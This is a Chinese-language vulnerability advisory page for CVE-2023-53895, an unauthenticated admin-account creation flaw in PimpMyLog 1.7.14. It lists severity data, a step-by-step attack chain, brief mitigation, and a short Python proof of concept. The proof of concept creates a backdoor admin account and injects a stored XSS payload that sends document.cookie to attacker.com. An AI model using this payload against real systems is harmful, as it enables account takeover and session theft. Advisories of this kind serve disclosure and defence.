CVE-2023-53895 CVSS 9.8 严重

CVE-2023-53895 PimpMyLog 1.7.14 未授权创建管理员账户漏洞

披露日期: 2025-12-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-53895

漏洞类型

不当访问控制

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PimpMyLog

漏洞概述

PimpMyLog 1.7.14存在严重的不当访问控制漏洞，攻击者可通过配置端点未经授权创建管理员账户。该漏洞源于应用程序对用户输入验证不足，允许通过未过滤的用户名字段注入恶意JavaScript代码。攻击者能够利用此漏洞创建隐藏的后门账户，从而获得对系统的持久访问权限。成功利用后，攻击者可进一步访问敏感的服务器端日志信息、环境变量及其他系统资源，对系统机密性、完整性和可用性造成严重影响。

技术细节

漏洞位于PimpMyLog的配置管理模块，该模块在处理用户注册请求时未正确实施权限检查和输入验证。具体问题包括：1) 缺少CSRF令牌验证；2) 用户名参数未进行充分的输入过滤和转义；3) 账户创建功能可被未认证用户访问。攻击者可通过构造特制的HTTP请求，在用户名字段中注入包含恶意JavaScript的Payload，利用存储型XSS漏洞执行任意客户端代码并创建隐藏账户。

攻击链分析

STEP 1

信息收集

识别目标PimpMyLog版本为1.7.14

STEP 2

构造恶意请求

通过配置端点发送包含恶意JavaScript的用户名

STEP 3

执行XSS攻击

注入的JavaScript在管理员访问时被执行

STEP 4

创建后门账户

利用漏洞创建隐藏的管理员账户

STEP 5

持久化访问

通过后门账户获得长期系统访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

target = 'http://target.com/pimpmylog'
payload = {
    'username': '<script>document.location="http://attacker.com/steal?c="+document.cookie</script>',
    'password': 'BackdoorPassword123!',
    'role': 'admin'
}

response = requests.post(f'{target}/config/account/create', json=payload)
print(f'Status: {response.status_code}')
print(f'Response: {response.text}')

影响范围

PimpMyLog 1.7.14

防御指南

临时缓解措施

立即限制对配置管理端点的访问，实施IP白名单或VPN访问控制。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表